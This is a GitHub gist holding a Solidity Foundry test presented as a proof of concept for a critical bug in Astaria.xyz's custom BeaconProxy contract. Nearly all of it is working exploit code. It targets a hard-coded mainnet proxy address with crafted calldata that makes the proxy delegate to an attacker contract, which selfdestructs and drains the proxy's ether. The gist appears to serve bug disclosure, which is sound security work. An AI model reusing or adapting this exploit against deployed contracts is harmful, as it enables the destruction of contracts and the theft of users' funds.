-
-
Save BunsDev/d91704c4b86678eaa220bc98f9833fc3 to your computer and use it in GitHub Desktop.
PoC of crit bug found in Astaria.xyz's custom BeaconProxy contract
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: UNLICENSED | |
| pragma solidity ^0.8.13; | |
| import "forge-std/Test.sol"; | |
| contract SheHateMe { | |
| receive() external payable {} | |
| function getImpl(uint8 x) public returns (address) { | |
| return address(this); | |
| } | |
| fallback() external { | |
| selfdestruct(payable(msg.sender)); | |
| } | |
| } | |
| contract HackAstaria is Test { | |
| SheHateMe public sheHateMe; | |
| address public proxy = payable(address(0x1bee35414De2691454bd7090DB64ececFB65581f)); | |
| function setUp() public { | |
| sheHateMe = new SheHateMe(); | |
| vm.deal(proxy, 69 ether); | |
| } | |
| function testHackinItInSanDiego() public { | |
| assertEq(proxy.balance, 69 ether); // proxy has 69 ether | |
| // the secret sauce | |
| bytes memory data = abi.encodePacked(bytes4(uint32(0x1badbabe)),uint(uint160(address(sheHateMe))), uint8(0x69), uint16(0x0015)); | |
| (bool success, bytes memory ret) = proxy.call(data); | |
| assertEq(success, true); | |
| assertEq(proxy.balance, 0); // proxy has no ether (because it selfdestructed) | |
| console.log("hack successful"); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment